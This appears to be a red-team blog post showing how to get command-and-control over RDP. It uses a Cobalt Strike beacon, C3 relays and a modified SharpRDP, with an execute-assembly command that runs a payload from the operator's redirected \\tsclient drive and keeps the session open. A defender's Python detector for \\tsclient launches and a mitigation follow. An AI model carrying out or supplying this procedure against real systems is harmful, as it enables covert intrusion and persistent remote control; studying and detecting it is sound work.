C2 over RDP using C3

C2 over RDP with mapped drives is nothing new; however, this post will show how SharpRDP and C3 can be used in tandem through a Cobalt Strike beacon to provide C2 when only 3389/TCP is accessible.

tl;dr

  1. In C3 create a new UncShareFile channel with the target folder set to a location on the machine that you’ll be RDP’ing from, i.e. C:\Users\Public\
  2. Generate the corresponding C3 Relay, but change the target folder to reference the same folder as it appears from inside an RDP session, i.e. \\tsclient\C\Users\Public
  3. Use my modified version of SharpRDP so that you can make use of the exit=false flag, keeping the session alive for C2
  4. Upload your payload to a location on the machine that you’ll be RDP’ing from, i.e. C:\Users\Public
  5. From your beacon, execute the following command:
    execute-assembly /path/to/SharpRDP.exe computername=<TARGET> command="\\tsclient\C\Users\Public\Payload.exe" username=<USERNAME> password=<PASSWORD> connectdrive=true exit=false

  6. This is going to create an RDP session with drive mapping enabled, execute Payload.exe from the mapped drive \\tsclient\C\Users\Public\, then keep the session alive so that the same share can be used by C3 for C2.

Instructions

The Scenario

You’ve got a beacon on a target, and have credentials that can RDP to a remote machine. You don’t want to/can’t proxy a real RDP session as the bandwidth isn’t sufficient, and the target only has 3389/TCP exposed inbound with all other inbound/outbound traffic blocked.

This guide assumes you already have a Cobalt Strike beacon and that you’re using C3 for C2. If not then please consult this for instructions on how to configure C3.

C3 Setup

  1. From an existing Gateway/Relay, select the AddNegotiationChannelUncShareFile command. Set the Filesystem path to a location on the source machine where C3 should write its C2 packets.

    Create new channel

  2. Close the window and double click this icon.

    Channel logo

  3. From the Interface Options drop-down, select New Relay.

  4. Leave everything at its default except the Filesystem path. This should refer to the same directory you specified above, but from the perspective of the target machine you're going to be RDP'ing into, i.e. \\tsclient\C\Users\Public. Click Create and Download Relay when done.

    Download Relay

  5. Copy this newly-generated Relay.exe to the source machine. Note: SharpRDP doesn’t like special characters in the command, so name your relays something simple.

    Upload Relay

  6. Run my modified version of SharpRDP using execute-assembly with the following command:

    execute-assembly /path/to/SharpRDP.exe computername=<TARGET> command="\\tsclient\C\Users\Public\Payload.exe" username=<USERNAME> password=<PASSWORD> connectdrive=true exit=false


    Execute SharpRDP

  7. The relay should now appear in the C3 console, meaning C2 has been successfully established.

    Relay Appearing in C3

  8. To add a beacon through this relay, select AddPeripheralBeacon.

    Add beacon

    Beacon landed
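From the defender's side, the distinctive artefact of the procedure above (both the tl;dr and the full C3 Setup) is a process whose image path lives under \\tsclient\, the share name Windows uses for RDP client drive redirection, or a command line that references that share. The following is an added example, not code from this post or from the C3/SharpRDP projects: a small Python detector run over constructed process-creation records. The field names (host, session_id, user, image, command_line) are this example's own, not a real Sysmon or Security 4688 schema, and the sample events are made up.

```python
import re
from typing import Dict, List, Optional, Tuple

# Matches a UNC path on the RDP client-drive redirection share (\\tsclient\<drive>\...)
# anywhere in a string, case-insensitively.
TSCLIENT_RE = re.compile(r"\\\\tsclient\\", re.IGNORECASE)

# Constructed sample process-creation records (field names are this example's own).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"host": "WS01", "session_id": 2, "user": r"CORP\jdoe",
     "image": r"C:\Windows\explorer.exe",
     "command_line": r"C:\Windows\explorer.exe"},
    # Binary executed straight from the redirected client drive, as in this post.
    {"host": "WS01", "session_id": 2, "user": r"CORP\jdoe",
     "image": r"\\tsclient\C\Users\Public\Relay.exe",
     "command_line": r"\\tsclient\C\Users\Public\Relay.exe"},
    # Share only referenced on the command line (staging a copy).
    {"host": "WS01", "session_id": 2, "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c copy \\tsclient\C\tools\a.exe C:\Users\Public\a.exe"},
    # Different host, mixed-case share name.
    {"host": "WS03", "session_id": 5, "user": r"CORP\asmith",
     "image": r"\\TSCLIENT\D\payload.exe",
     "command_line": r"\\TSCLIENT\D\payload.exe"},
    # Benign system process, no share reference.
    {"host": "WS02", "session_id": 0, "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"svchost.exe -k netsvcs"},
]


def tsclient_references(event: Dict[str, object]) -> List[str]:
    """Return the names of the fields (image, command_line) that contain a \\tsclient\ path."""
    hits = []
    for field in ("image", "command_line"):
        if TSCLIENT_RE.search(str(event.get(field, ""))):
            hits.append(field)
    return hits


def classify(event: Dict[str, object]) -> Optional[Dict[str, object]]:
    """Turn one event into a finding, or None if it does not touch the share.

    An image that itself lives on \\tsclient is a binary run directly from the
    RDP client's drive and is rated high; a command line that merely mentions the
    share (copy/xcopy staging) is rated medium.
    """
    hits = tsclient_references(event)
    if not hits:
        return None
    severity = "high" if "image" in hits else "medium"
    return {
        "host": event["host"],
        "session_id": event["session_id"],
        "user": event["user"],
        "image": event["image"],
        "severity": severity,
        "matched_fields": hits,
    }


def find_tsclient_launches(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Run the rule over a batch of events; high-severity findings sort first."""
    findings = [f for f in (classify(e) for e in events) if f is not None]
    order = {"high": 0, "medium": 1}
    return sorted(findings, key=lambda f: (order[str(f["severity"])], str(f["host"])))


def summarize_by_session(findings: List[Dict[str, object]]) -> Dict[Tuple[str, int], int]:
    """Count findings per (host, session) so one RDP session that launches several
    tools from the share shows up as a single, louder signal."""
    counts: Dict[Tuple[str, int], int] = {}
    for f in findings:
        key = (str(f["host"]), int(f["session_id"]))  # type: ignore[arg-type]
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    results = find_tsclient_launches(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f['severity']}] {f['host']} session {f['session_id']} {f['user']}: "
              f"{f['image']} (matched: {', '.join(f['matched_fields'])})")
    print(summarize_by_session(results))
```

The rule keys on the share name rather than on SharpRDP or C3 specifically, so it also covers the older hand-driven "mapped drive" variants the post mentions. On hosts where drive redirection is not needed, the Remote Desktop Services policy "Do not allow drive redirection" removes the \\tsclient share entirely, which denies this channel its transport.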

Written on November 10, 2020